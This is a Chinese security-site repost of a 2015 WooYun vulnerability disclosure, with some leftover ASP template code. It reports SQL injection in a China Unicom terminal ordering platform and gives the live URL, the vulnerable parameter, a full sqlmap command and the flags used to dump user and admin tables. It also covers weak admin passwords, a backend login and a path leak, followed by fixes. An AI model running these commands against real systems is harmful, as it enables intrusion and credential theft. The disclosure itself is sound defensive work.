<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("漏洞,厂商,中国联通,注入,终端,SQL") PageTitle=stripHTML("某联通终端订购平台SQL注入+SA权限+弱密码+路径泄漏") ArticleIntro=stripHTML("77169.com小编引言: 某联通终端订购平台SQL注入+SA权限+弱密码+路径泄漏 ,漏洞的主要原因:Sql注入+弱口令") Articlecontent=stripHTML(" code 区域北京联通终端订购平台http://dg.uninx.com/ 1、注入点:code 区域http://dg.uninx.com/dgpt/lis…") ModuleName = stripHTML("exploits") InfoID = stripHTML("143864") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.org/") ChannelDir=stripHTML("exploits") %> 某联通终端订购平台SQL注入+SA权限+弱密码+路径泄漏 - 华盟网 - http://www.77169.org
您现在的位置: 华盟网 >> 漏洞 >> 网站漏洞 >> 正文

[组图]SQLMap入侵某联通实例

2015/2/26 作者:未知 来源: wooyun.org
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

 


code 区域
北京联通终端订购平台
http://dg.uninx.com/



1、注入点:

code 区域
http://dg.uninx.com/dgpt/list.php?searchword=&type=2&inpbrand=&inpguodaishang=4&inpjiage=&inpzhuping=&inpwangluolx=&inp4Gwangluo=&inp3Gwangluo=&inp2Gwangluo=&inpxitong=&inphexinshu=&inpshexiangtou=&inpSIMka=&inptedian=



参数:inpguodaishang未过滤导致boolean-based blind&UNION query&AND/OR time-based blind注入



2、SQLMAP测试过程

测试语句:

code 区域
sqlmap.py -u "http://dg.uninx.com/dgpt/list.php?
searchword=&type=2&inpbrand=&inpguodaishang=4&inpjiage=&inpzhuping=&inpwangluolx=&inp4Gwangluo=&inp3Gwangluo=&inp2Gwangluo=&inpxitong=&inphexinshu=&inpshexiangtou=&inpSIMka=&inptedian=" -p inpguodaishang --current-db --current-user --level 3 --threads 3 --tamper between.py



--current-db --current-usr.jpg



--dbs.jpg



--users.jpg



--tables -D zddg.jpg



--columns -T user -D zddg.jpg



--count -T user -D zddg.jpg



--dump -T user -D zddg.jpg



这个表里面的username应该是员工号,密码全部为弱口令

--unicom_user -D zddg.png



联通用户674个

3、管理员密码存在弱口令

--dump -T sys_admin_user -D zddg.png



里面9个用户,5个弱口令,其中三个一样。

4、SA权限,有部分数据库用户密码较简单

--is-dba.jpg



--passwords.jpg





5、弱密码进入后台

进入后台.jpg



里面有很多数据,其中包括敏感数据,就不截图了,进来就退出了,请尽快修改弱密码!~~~

而且已经内部通知修改弱口令,但是还是没有改掉哦,通知应该重视啊!~~~



6、路径泄漏

爆路径.jpg









漏洞证明:

--dump -T sys_admin_user -D zddg.png



--is-dba.jpg



--passwords.jpg



爆路径.jpg

修复方案:

1、过滤参数,防注入

2、安全狗

3、修改数据库权限以及弱密码

4、修改管理员用户弱密码

5、绝对路径的泄漏问题

6、你们懂得~~~



请尽快修改弱口令,弱口令啊!~~~

 

 

漏洞概要

缺陷编号: WooYun-2015-91187

漏洞标题: 某联通终端订购平台SQL注入+SA权限+弱密码+路径泄漏

相关厂商: 中国联通

漏洞作者: Ch4r0n

提交时间: 2015-01-11 13:27

公开时间: 2015-02-25 13:27

漏洞类型: SQL注射漏洞

危害等级: 高

漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理


漏洞详情

披露状态:

2015-01-11: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开

简要描述:

这个应可以算得上大厂商了吧?
1、SQL注入涉及多个数据库
2、SA权限,某数据库密码可以破解
3、后台用户密码弱口令

漏洞hash:f9c3ce1fb8f99593cc965dc4e220f73c